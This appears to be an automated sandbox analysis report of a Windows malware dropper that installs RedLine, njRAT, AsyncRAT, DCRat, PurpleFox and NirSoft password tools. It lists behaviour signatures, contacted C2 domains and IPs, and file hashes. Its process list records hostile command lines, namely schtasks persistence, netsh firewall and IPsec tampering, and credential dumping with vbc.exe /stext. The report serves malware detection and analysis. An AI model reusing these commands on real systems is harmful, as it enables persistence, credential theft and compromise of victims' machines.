| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
PurpleFox
Purplefox family
RedLine
Redline family
njRAT/Bladabindi
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\healastounding.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\healastounding.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Pluto Panel.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\gay.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\aaa.exe | N/A |
Uses the VBS compiler for execution
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\TXPlatforn.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\TXPlatforn.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Help\Winlogon.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Help\active_desktop_render.dll | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Cursors\WUDFhosts.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\aaa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\healastounding.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Pluto Panel.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\test.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\gay.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe
"C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe"
C:\Users\Admin\AppData\Roaming\healastounding.exe
"C:\Users\Admin\AppData\Roaming\healastounding.exe"
C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
"C:\Users\Admin\AppData\Roaming\Pluto Panel.exe"
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
C:\Users\Admin\AppData\Roaming\22.exe
"C:\Users\Admin\AppData\Roaming\22.exe"
C:\Users\Admin\AppData\Roaming\___11.19.exe
"C:\Users\Admin\AppData\Roaming\___11.19.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=Block
C:\Users\Admin\AppData\Roaming\test.exe
"C:\Users\Admin\AppData\Roaming\test.exe"
C:\Users\Admin\AppData\Roaming\gay.exe
"C:\Users\Admin\AppData\Roaming\gay.exe"
C:\Users\Admin\AppData\Roaming\Opus.exe
"C:\Users\Admin\AppData\Roaming\Opus.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
C:\Users\Admin\AppData\Local\Temp\\svchost.exe
C:\Users\Admin\AppData\Roaming\aaa.exe
"C:\Users\Admin\AppData\Roaming\aaa.exe"
C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
C:\Users\Admin\AppData\Roaming\4.exe
"C:\Users\Admin\AppData\Roaming\4.exe"
C:\Windows\SysWOW64\TXPlatforn.exe
C:\Windows\SysWOW64\TXPlatforn.exe -auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\svchost.exe > nul
C:\Users\Admin\AppData\Local\Temp\svchos.exe
C:\Users\Admin\AppData\Local\Temp\\svchos.exe
C:\Users\Admin\AppData\Roaming\a.exe
"C:\Users\Admin\AppData\Roaming\a.exe"
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "DHCP Service" /xml "C:\Users\Admin\AppData\Local\Temp\tmp98C5.tmp"
C:\Windows\SysWOW64\TXPlatforn.exe
C:\Windows\SysWOW64\TXPlatforn.exe -acsi
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"
C:\Users\Admin\AppData\Roaming\3.exe
"C:\Users\Admin\AppData\Roaming\3.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Filter1
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "DHCP Service Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpA355.tmp"
C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe
C:\Windows\system32\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe "c:\windows\system32\240621531.txt",MainThread
C:\Users\Admin\AppData\Roaming\mediaget.exe
"C:\Users\Admin\AppData\Roaming\mediaget.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default User\sihost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Documents and Settings\StartMenuExperienceHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Users\Default User\TextInputHost.exe'" /rl HIGHEST /f
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Windows\System32\wbem\scrcons\unsecapp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\hrtfs\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "a" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\pid\a.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Documents and Settings\sihost.exe'" /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6Rif1IpQLy.bat"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"
C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.86.200.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | yabynennet.xyz | udp |
| US | 107.178.223.183:81 | yabynennet.xyz | tcp |
| US | 8.8.8.8:53 | whatismyipaddress.com | udp |
| US | 104.19.223.79:80 | whatismyipaddress.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 8.8.8.8:53 | 183.223.178.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gfhhjgh.duckdns.org | udp |
| US | 8.8.8.8:53 | 79.223.19.104.in-addr.arpa | udp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| CN | 59.56.110.231:8898 | tcp | |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| RU | 80.87.192.115:80 | tcp | |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| CA | 172.98.92.42:58491 | tcp | |
| US | 104.19.223.79:443 | whatismyipaddress.com | tcp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
Files
memory/2228-0-0x0000000075222000-0x0000000075223000-memory.dmp
memory/2228-1-0x0000000075220000-0x00000000757D1000-memory.dmp
memory/2228-2-0x0000000075220000-0x00000000757D1000-memory.dmp
C:\Users\Admin\AppData\Roaming\healastounding.exe
| MD5 | 6fb798f1090448ce26299c2b35acf876 |
| SHA1 | 451423d5690cffa02741d5da6e7c45bc08aefb55 |
| SHA256 | b4f86ff48c5f6b01e0ad4543fb78e0435e81f3ec2aaca89866862157c0dacf4f |
| SHA512 | 9cc2421a2f3ab01d15be62a848947b03f1a8212cfd923573cf70f8c10bd8d124aee3b251828834236af291ea12450ac2580a712e53a022ce11b4d71b0357d8c3 |
C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
| MD5 | ed666bf7f4a0766fcec0e9c8074b089b |
| SHA1 | 1b90f1a4cb6059d573fff115b3598604825d76e6 |
| SHA256 | d1330d349bfbd3aea545fa08ef63339e82a3f4d04e27216ecc4c45304f079264 |
| SHA512 | d0791eaa9859d751f946fd3252d2056c29328fc97e147a5234a52a3728588a3a1aaa003a8e32863d338ebdca92305c48b6fa12ca1e620cf27460bf091c3b6d49 |
memory/4904-22-0x0000000075220000-0x00000000757D1000-memory.dmp
memory/4904-29-0x0000000075220000-0x00000000757D1000-memory.dmp
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
| MD5 | 0fd7de5367376231a788872005d7ed4f |
| SHA1 | 658e4d5efb8b14661967be2183cc60e3e561b2b6 |
| SHA256 | 9083992637e90e412e6f4e77331eb69ee8db821c54bbc38533e0f889cc4ca9dd |
| SHA512 | 522d5be2803fbce0d12c325cc2ef1e3a92cec03aeba7d1164530093ad58caecd827dd557ca3c182a66c6667150e731de37bb552d19425f96cc78fe3423e1a863 |
memory/2064-42-0x0000000075220000-0x00000000757D1000-memory.dmp
memory/2064-51-0x0000000075220000-0x00000000757D1000-memory.dmp
memory/2064-45-0x0000000075220000-0x00000000757D1000-memory.dmp
C:\Users\Admin\AppData\Roaming\22.exe
| MD5 | dbf9daa1707b1037e28a6e0694b33a4b |
| SHA1 | ddc1fcec1c25f2d97c372fffa247969aa6cd35ef |
| SHA256 | a604a3ff78644533fac5ee9f198e9c5f2fa1ae2a5828186367a9e00935cff6b6 |
| SHA512 | 145b606ffd58554050ff8712ddb38c1c66dd5f33ea15fd48474e1c165b2c0348d2413e16c7ad07ff1c65ce71e2be23e3758e6d48c4f2454d5407982119706bfd |
C:\Users\Admin\AppData\Roaming\___11.19.exe
| MD5 | a071727b72a8374ff79a695ecde32594 |
| SHA1 | b2aba60b3332d6b8f0a56cea310cdc2bdb4f9ffc |
| SHA256 | 8ecdfe60eacb5bf647ae69bcbc41dd727ea3089e92b4b08ebca3a8d162e50745 |
| SHA512 | 854b93fb6b9bf0fe4caef5572935852ce8becf2bc7bd41b192a4b3cefb7854a2405c6c0c06bbdd4e1026ff9440ec753911dcc935fe68118e322614c1b918e400 |
memory/8-50-0x0000000000400000-0x0000000000625000-memory.dmp
C:\Users\Admin\AppData\Roaming\test.exe
| MD5 | 7e50b292982932190179245c60c0b59b |
| SHA1 | 25cf641ddcdc818f32837db236a58060426b5571 |
| SHA256 | a8dde4e60db080dfc397d7e312e7e9f18d9c08d6088e8043feeae9ab32abdbb8 |
| SHA512 | c6d422d9fb115e1b6b085285b1d3ca46ed541e390895d702710e82a336f4de6cc5c9183f8e6ebe35475fcce6def8cc5ffa8ee4a61b38d7e80a9f40789688b885 |
C:\Users\Admin\AppData\Roaming\Opus.exe
| MD5 | 759185ee3724d7563b709c888c696959 |
| SHA1 | 7c166cc3cbfef08bb378bcf557b1f45396a22931 |
| SHA256 | 9384798985672c356a8a41bf822443f8eb0d3747bfca148ce814594c1a894641 |
| SHA512 | ed754357b1b995de918af21fecd9d1464bdea6778f7ab450a34e3aae22ba7eebc02f2442af13774abfdf97954e419ec9e356b54506c7e3bf12e3b76ee882fa2c |
C:\Users\Admin\AppData\Roaming\gay.exe
| MD5 | 8eedc01c11b251481dec59e5308dccc3 |
| SHA1 | 24bf069e9f2a1f12aefa391674ed82059386b0aa |
| SHA256 | 0184983a425fef55d46b7e0eb729a245730ee26414ebe4b155917c0124a19c2d |
| SHA512 | 52388313b21f14aa69c8b37e0fe0b73f66aa92f08651a16c820aae65d341dc1af6b48f3c8d4f657ac990eeaf4b9a01ae769bca4d3625550011708697d22b69cc |
C:\Users\Admin\AppData\Roaming\aaa.exe
| MD5 | 860aa57fc3578f7037bb27fc79b2a62c |
| SHA1 | a14008fe5e1eb88bf46266de3d5ee5db2e0a722b |
| SHA256 | 5430565c4534b482c7216a0ae75d04e201ee0db0386682c0c010243083c28d29 |
| SHA512 | 6639b3e2594e554c7fa811f22e1c514474d34220155b4c989ad8716db1a0aea65894aa23d78c12a4618c57312da00353a77dd8e6c6bdd927bf865f2e98aff8f1 |
C:\Users\Admin\AppData\Roaming\a.exe
| MD5 | 52cfd35f337ca837d31df0a95ce2a55e |
| SHA1 | 88eb919fa2761f739f02a025e4f9bf1fd340b6ff |
| SHA256 | 5975e737584ddf2601c02e5918a79dad7531df0e13dca922f0525f66bec4b448 |
| SHA512 | b584282f6f5396c3bbed7835be67420aa14d11b9c42a88b0e3413a07a6164c22d6f50d845d05f48cb95d84fd9545d0b9e25e581324a08b3a95ced9f048d41d73 |
memory/1632-145-0x0000000010000000-0x00000000101B6000-memory.dmp
C:\Windows\SysWOW64\240621531.txt
| MD5 | 90fc82e03a29ddfb8aa574f126c85534 |
| SHA1 | b802eb0e564167738586e058b2e1516c60555e87 |
| SHA256 | 0b674c6c4631d19e21e8716cb2d57fb155c1b00999b2e694ec948207a40a8831 |
| SHA512 | 75732b3c52f9116150ecd081fd425e1733d0c1f6ab2e1b2789255df99b5f7a9fdd6fa7374a64dcb98ff69ae5c69237e8a24e560fa87cde2e91891dbcbf1ea497 |
memory/3720-165-0x0000000000400000-0x00000000007C2000-memory.dmp
memory/4904-164-0x0000000075220000-0x00000000757D1000-memory.dmp
C:\Windows\SysWOW64\TXPlatforn.exe
| MD5 | a4329177954d4104005bce3020e5ef59 |
| SHA1 | 23c29e295e2dbb8454012d619ca3f81e4c16e85a |
| SHA256 | 6156d003d54dcf2ee92f21bd6e7a6a7f91730bd2804381260bcabe465abe6ddd |
| SHA512 | 81e9d456a4abfc7cd9e0943d4a0ce15523362c3179f3368381d1d7974f80a9f9113b5404b96e67e91684e0ea1895b7d0073e4c48d0bfc4fd0244b1af6acf0208 |
memory/3764-178-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/3720-185-0x0000000000400000-0x00000000007C2000-memory.dmp
memory/3764-189-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/3720-190-0x0000000006370000-0x0000000006988000-memory.dmp
memory/3720-200-0x0000000005D70000-0x0000000005E7A000-memory.dmp
memory/3720-199-0x0000000005D50000-0x0000000005D62000-memory.dmp
memory/3720-202-0x0000000005E80000-0x0000000005EBC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
| MD5 | 78d40b12ffc837843fbf4de2164002f6 |
| SHA1 | 985bdffa69bb915831cd6b81783aef3ae4418f53 |
| SHA256 | 308a15dabdc4ce6b96dd54954a351d304f1fcb59e8c93221ba1c412bcdfd1c44 |
| SHA512 | c6575e1771d37ded4089d963bea95deac78b329ed555c991d7c559ee1970dd0887a965e88c09981529adc9c25df5cfd3d57e3dce6724da1f01f1198f0f460b79 |
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
| MD5 | 870d6e5aef6dea98ced388cce87bfbd4 |
| SHA1 | 2d7eee096d38d3c2a8f12fcba0a44b4c4da33d54 |
| SHA256 | 6d50833895b2e3eb9d6f879a6436660127c270b6a516cda0253e56a3d8b7fba0 |
| SHA512 | 0d55ab28b2f80136af121b870b7503551d87bbeb2848cf9a32540006cac9a5e346d9fcce2bf1223a22927f72a147b81487533a10b91373d4fa4429d6159fd566 |
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
| MD5 | b14120b6701d42147208ebf264ad9981 |
| SHA1 | f3cff7ac8e6c1671d2c3387648e54f80957196de |
| SHA256 | d987bd57582a22dfc65901ff256eda635dc8dad598c93b200002130b87fcfd97 |
| SHA512 | 27a066b9d842acd7b1e0ca1dd045a9262b0d0a00c180eedeebeb9d3091925b184186fc3a1d2df28ae4c55626febe6abf6fdb5e26d45fd1a2968d57540e7cf29b |
memory/3720-232-0x0000000005F00000-0x0000000005F4C000-memory.dmp
memory/4212-238-0x0000000000400000-0x00000000019AA000-memory.dmp
C:\Users\Admin\AppData\Roaming\3.exe
| MD5 | 748a4bea8c0624a4c7a69f67263e0839 |
| SHA1 | 6955b7d516df38992ac6bff9d0b0f5df150df859 |
| SHA256 | 220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e |
| SHA512 | 5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd |
memory/1992-244-0x0000000000DE0000-0x0000000000E74000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\X.ico
| MD5 | fb44f7af2882d222b600539171f54c1d |
| SHA1 | 0c5a1a0b1620a55a0f194464227be25a2f0347e1 |
| SHA256 | f2a78e76259bc8fd4ab6af7b4e16dfb49a10643308aca3d14c09e61ac0ebd487 |
| SHA512 | 21e906473f64303c4c8d55213ccb84f4a803c11fb5eef34ce3194adfb391ccbcc91e7c399556c7a4e4f3d33b9b19524d4499ec771ee8e1a10df26ea7cc2dcb67 |
C:\Users\Admin\AppData\Local\Temp\tmp98C5.tmp
| MD5 | 28219e12dd6c55676bdf791833067e9d |
| SHA1 | a4c854d929404e5073d16610c62dfa331c9727a0 |
| SHA256 | d3035bd90ad0e9fedeecb44da09e78421b5e6e1e0bbed1afc624750043355540 |
| SHA512 | e8c118063052002745c503b8fd0decfecf38f31e71e4dbdedc79bb8e91d443d65a33e7d983d4c0e1d6ee1eb9045100c2324b941b3bef00e69d4d91eb7d6d0161 |
memory/1516-222-0x0000000000400000-0x000000000044F000-memory.dmp
memory/1516-220-0x0000000000400000-0x000000000044F000-memory.dmp
memory/3764-191-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/3720-184-0x0000000000400000-0x00000000007C2000-memory.dmp
C:\Users\Admin\AppData\Roaming\4.exe
| MD5 | e6dace3f577ac7a6f9747b4a0956c8d7 |
| SHA1 | 86c71169025b822a8dfba679ea981035ce1abfd1 |
| SHA256 | 8b4b846fe1023fa173ab410e3a5862a4c09f16534e14926878e387092e7ffb63 |
| SHA512 | 1c8554d3d9a1b1509ba1df569ede3fb7a081bef84394c708c4f1a2fb8779f012c74fbf6de085514e0c8debb5079cc23c6c6112b95bf2f0ab6a8f0bd156a3e268 |
C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
| MD5 | 8f1c8b40c7be588389a8d382040b23bb |
| SHA1 | bef5209ae90a3bd3171e1e0be4e8148c4ccd8a6a |
| SHA256 | ed58ffee46a583c177c792b56c9fc20ccd9509d125f2e3fc90c4f48de7e2c2a1 |
| SHA512 | 9192b6f2f8320a728c445f9cd6e6d66495ad0ebebd7ff193dc09ee8ae57b3933c1b75dc208e7d638db273cb9d31b4ca24ee7bfd9729ff0cdbf432d72bb322b1f |
C:\Users\Admin\AppData\Local\Temp\svchos.exe
| MD5 | 3b377ad877a942ec9f60ea285f7119a2 |
| SHA1 | 60b23987b20d913982f723ab375eef50fafa6c70 |
| SHA256 | 62954fdf65e629b39a29f539619d20691332184c6b6be5a826128a8e759bfa84 |
| SHA512 | af3a71f867ad9d28772c48b521097f9bf8931eb89fd2974e8de10990241419a39ddc3c0b36dd38aac4fdf14e1f0c5e228692618e93adce958d5b5dab8940e46f |
memory/1632-143-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/1632-146-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/1328-115-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/1328-114-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/1328-112-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/4508-88-0x0000000000370000-0x0000000000382000-memory.dmp
memory/2228-89-0x0000000075220000-0x00000000757D1000-memory.dmp
memory/1992-287-0x0000000001630000-0x000000000163C000-memory.dmp
memory/1992-288-0x0000000001640000-0x000000000164A000-memory.dmp
memory/4212-304-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/4212-312-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/4212-315-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/4212-308-0x00000000060E0000-0x00000000064A2000-memory.dmp
C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe
| MD5 | 889b99c52a60dd49227c5e485a016679 |
| SHA1 | 8fa889e456aa646a4d0a4349977430ce5fa5e2d7 |
| SHA256 | 6cbe0e1f046b13b29bfa26f8b368281d2dda7eb9b718651d5856f22cc3e02910 |
| SHA512 | 08933106eaf338dd119c45cbf1f83e723aff77cc0f8d3fc84e36253b1eb31557a54211d1d5d1cb58958188e32064d451f6c66a24b3963cccd3de07299ab90641 |
C:\Users\Admin\AppData\Local\Temp\tmpA355.tmp
| MD5 | 7f4b37265a0a4b0fea67999d11d911e8 |
| SHA1 | 1b8e13e6a27c3768c30cf713b79eaa8a757e1349 |
| SHA256 | 39b16b3a00b6b43c6820357127228c0768a577153014ce7b0ea3c585244dc08b |
| SHA512 | ef97ccfb663555aedc7fdc4b3ac4cd6536c80a778b4ec3bc6124a09544733988de1dac1e6a3714b0d6e8713e3523e0732d5dfcf674f2c5e1f3eadacb0c8e5e03 |
memory/1992-292-0x0000000001680000-0x000000000168C000-memory.dmp
memory/4212-295-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/4212-301-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/4212-298-0x00000000060E0000-0x00000000064A2000-memory.dmp
C:\ProgramData\kaosdma.txt
| MD5 | 2c807857a435aa8554d595bd14ed35d1 |
| SHA1 | 9003a73beceab3d1b1cd65614347c33117041a95 |
| SHA256 | 3c4fae56f61b7cdf09709c2aaf65ca47d3bf9077b1e5eb0eb1e6c5c34923eb9b |
| SHA512 | 95c6fa9f5b342ef34d896f083700ee12d55723e24aff42805bac5c1aa73f07d0db4f9d435d31a61da187edc2336252dfb38529b3f2b1d2039aa2a8e65d64a7a9 |
memory/4212-290-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/1992-289-0x0000000001650000-0x000000000165C000-memory.dmp
memory/2064-335-0x0000000075220000-0x00000000757D1000-memory.dmp
memory/2064-338-0x0000000075220000-0x00000000757D1000-memory.dmp
memory/1516-348-0x0000000000400000-0x000000000044F000-memory.dmp
memory/3832-358-0x0000000000400000-0x000000000041B000-memory.dmp
